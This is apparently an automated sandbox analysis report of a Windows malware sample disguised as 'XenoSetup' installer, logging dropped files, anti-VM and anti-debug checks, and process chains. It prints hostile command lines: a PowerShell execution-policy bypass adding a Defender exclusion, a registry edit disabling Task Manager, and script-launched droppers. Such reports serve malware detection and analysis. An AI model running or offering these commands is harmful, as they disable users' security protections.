Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lmJukoKX.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZTxvzCno.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WKMEYgAB.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BcHAIFcQ.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kEjDZxDz.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uOpJsBHp.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GyShWgyC.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qodKYthi.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vMsrqipz.log	Jump to dropped file
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eLGexRyL.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MPdHuBxA.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bGOWfMqu.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GpvhmufF.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ItmQLqVf.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZSKNtyuw.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\remTNUPL.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\UfDWuYEk.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LxMgmcSS.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe.exe (copy)	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\frbUEvTD.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vcvJAqxW.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\Aqnqislq.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xvoKkvvU.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NpzpwslB.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ARRIhAyp.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ldZbGFkR.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LuUydMov.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PIQPERQj.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pczkrlLQ.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IlCyhHua.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GGCzAPYH.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ESyrPCdJ.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TZhoQTpI.log	Jump to dropped file
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XOSeUCEW.log	Jump to dropped file
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NZUxJEKO.log	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Xeno.exe

API coverage: 6.9 %

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe TID: 2188	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe TID: 1824	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe TID: 4552	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe TID: 4832	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe TID: 4068	Thread sleep time: -922337203685477s >= -30000s
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe TID: 6784	Thread sleep time: -922337203685477s >= -30000s
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe TID: 1832	Thread sleep time: -922337203685477s >= -30000s
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe TID: 3820	Thread sleep time: -922337203685477s >= -30000s
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe TID: 6128	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe TID: 3220	Thread sleep time: -922337203685477s >= -30000s
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe TID: 6844	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FEA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	6_2_00FEA69B
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_0100B348 FindFirstFileExA,	6_2_0100B348
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FFC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	6_2_00FFC220
Source: C:\Users\user\AppData\Local\Temp\Xeno.exe	Code function: 7_2_00007FF68D5ECD20 GetFileAttributesExW,GetFullPathNameW,GetFullPathNameW,_invalid_parameter_noinfo_noreturn,GetFileAttributesExW,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,FindFirstFileExW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,Concurrency::cancel_current_task,	7_2_00007FF68D5ECD20

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe

Code function: 6_2_00FFE6A3 VirtualQuery,GetSystemInfo,

6_2_00FFE6A3

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Thread delayed: delay time: 922337203685477
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Thread delayed: delay time: 922337203685477
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Thread delayed: delay time: 922337203685477
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Thread delayed: delay time: 922337203685477
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Thread delayed: delay time: 922337203685477
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Thread delayed: delay time: 922337203685477

Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior

Source: XenoSetup(1).exe, 0000000A.00000003.2470518978.000000000082B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000011.00000002.2736851224.0000000003550000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G%
Source: XenoSetup(1).exe, 00000010.00000003.2555154788.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%0A
Source: XenoSetup(1).exe, 00000010.00000003.2555154788.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: NZdXlPbVdUubKXQ.exe, 00000020.00000002.2722151836.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@YS

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe

API call chain: ExitProcess graph end node

graph_6-25104

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe

Code function: 6_2_00FFF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_00FFF838

Source: C:\Users\user\AppData\Local\Temp\Xeno.exe

Code function: 7_2_00007FF68D5ECB70 LoadLibraryA,GetProcAddress,_invalid_parameter_noinfo_noreturn,

7_2_00007FF68D5ECB70

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe

Code function: 6_2_01007DEE mov eax, dword ptr fs:[00000030h]

6_2_01007DEE

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe

Code function: 6_2_0100C030 GetProcessHeap,

6_2_0100C030

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process token adjusted: Debug
Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe	Process token adjusted: Debug
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process token adjusted: Debug
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process token adjusted: Debug
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FFF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00FFF838
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FFF9D5 SetUnhandledExceptionFilter,	6_2_00FFF9D5
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_00FFFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00FFFBCA
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Code function: 6_2_01008EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_01008EBD
Source: C:\Users\user\AppData\Local\Temp\Xeno.exe	Code function: 7_2_00007FF68D5F167C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00007FF68D5F167C
Source: C:\Users\user\AppData\Local\Temp\Xeno.exe	Code function: 7_2_00007FF68D5F19C0 SetUnhandledExceptionFilter,	7_2_00007FF68D5F19C0
Source: C:\Users\user\AppData\Local\Temp\Xeno.exe	Code function: 7_2_00007FF68D5F181C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00007FF68D5F181C

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe'
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe'			Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe'

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe'	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe "C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe"	Jump to behavior
Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\Xeno.exe "C:\Users\user\AppData\Local\Temp\Xeno.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll/DriverbrokerCrtDhcp.exe"	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline"	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.cmdline"	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.cmdline"	Jump to behavior
Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8dcADkVv20.bat"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4177.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCEACDD11852CD4DF0A8C4FA8867592994.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES436B.tmp" "c:\Users\user\AppData\Local\Temp\CSCF5A66DC0AE3041F58A3C1CE4B9A61B98.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES458E.tmp" "c:\Windows\System32\CSC3568A44F8D2D461ABD894E9C160B8C.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll/DriverbrokerCrtDhcp.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll/DriverbrokerCrtDhcp.exe"

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe

Code function: 6_2_00FFF654 cpuid

6_2_00FFF654

Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe

Code function: GetLocaleInfoW,GetNumberFormatW,

6_2_00FFAF0F

Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe	Queries volume information: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
